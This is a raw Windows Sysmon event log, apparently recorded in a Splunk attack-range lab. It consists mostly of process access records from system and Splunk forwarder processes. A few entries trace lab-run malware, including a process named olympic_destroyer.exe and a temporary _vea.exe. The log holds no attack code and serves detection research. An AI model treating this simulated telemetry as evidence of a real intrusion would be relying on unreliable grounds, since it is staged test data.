11:07:19.233{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295587Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:19.233{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295586Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:19.233{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295585Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:19.233{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1567-6216-CC06-000000003802}7156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295584Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:19.233{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1567-6216-CC06-000000003802}7156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295583Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:19.235{C8EA50B7-1567-6216-CC06-000000003802}7156C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000295582Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:19.102{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C563E7598234B58A5A0C8198E868B158,SHA256=D9595CA6D12102918E715F107D01632E24A70162742BEAED607B45CF64008A0E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295612Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:20.765{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1568-6216-CE06-000000003802}4484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295611Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:20.764{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295610Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:20.764{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295609Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:20.763{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295608Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:20.763{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295607Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:20.763{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1568-6216-CE06-000000003802}4484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295606Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:20.762{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1568-6216-CE06-000000003802}4484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000295605Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:20.761{C8EA50B7-1568-6216-CE06-000000003802}4484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000295604Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:20.581{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000295603Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:20.581{C8EA50B7-154D-6216-C506-000000003802}6736C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000295602Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:20.242{C8EA50B7-1567-6216-CD06-000000003802}71201016C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000295601Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:20.117{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DED06E582E9F83E6B8C9409C9757B015,SHA256=94DA6F13BADCACEE38F5E530CF9F235C12577928EF32F40384FA720B4BCA9113,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000219710Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:18.481{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx62409-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000219709Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:20.255{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=7983F2AAA042D9472EB6A609BE72332B,SHA256=414BA51376BE122C4A386ABA68A04BB546382BEC0FCE2C7013EB9E40A4E9157A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219708Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:20.255{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=20FEECD94EAE22BAC5005AEBAEE71D46,SHA256=9E47D23BDF8E34180B4E9E8C7FD5CBEF55997A0FCF421647D9E18ED831EDEC23,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219707Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:20.068{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE1953E2EB609A978D923B2E0246583D,SHA256=3081BB5AF3780C060E512364ABF786051F0110CB51DA9BA467B1A46A00AD7426,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219712Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:21.552{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F279CB6CABA7F94F0764AFFEFE03C45B,SHA256=C6A1659C6F1CE1DB6F9A256E2ACFA85E5F1ACA72446AD9F29524EA677B4804DF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000219711Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:07:21.084{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8DA62B55D76D35203B867FDA4852CF0F,SHA256=FC020E8FAB222012DC6CDFBF4C5F0AB6979E8CE535B67FFA15C6AF2346E46BCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000295622Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:21.443{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1569-6216-CF06-000000003802}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295621Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:21.443{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295620Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:21.443{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295619Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:21.443{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295618Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:21.443{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000295617Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:21.443{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1569-6216-CF06-000000003802}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000295616Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:07:21.443{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1569-6216-CF06-000000003802}7128C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 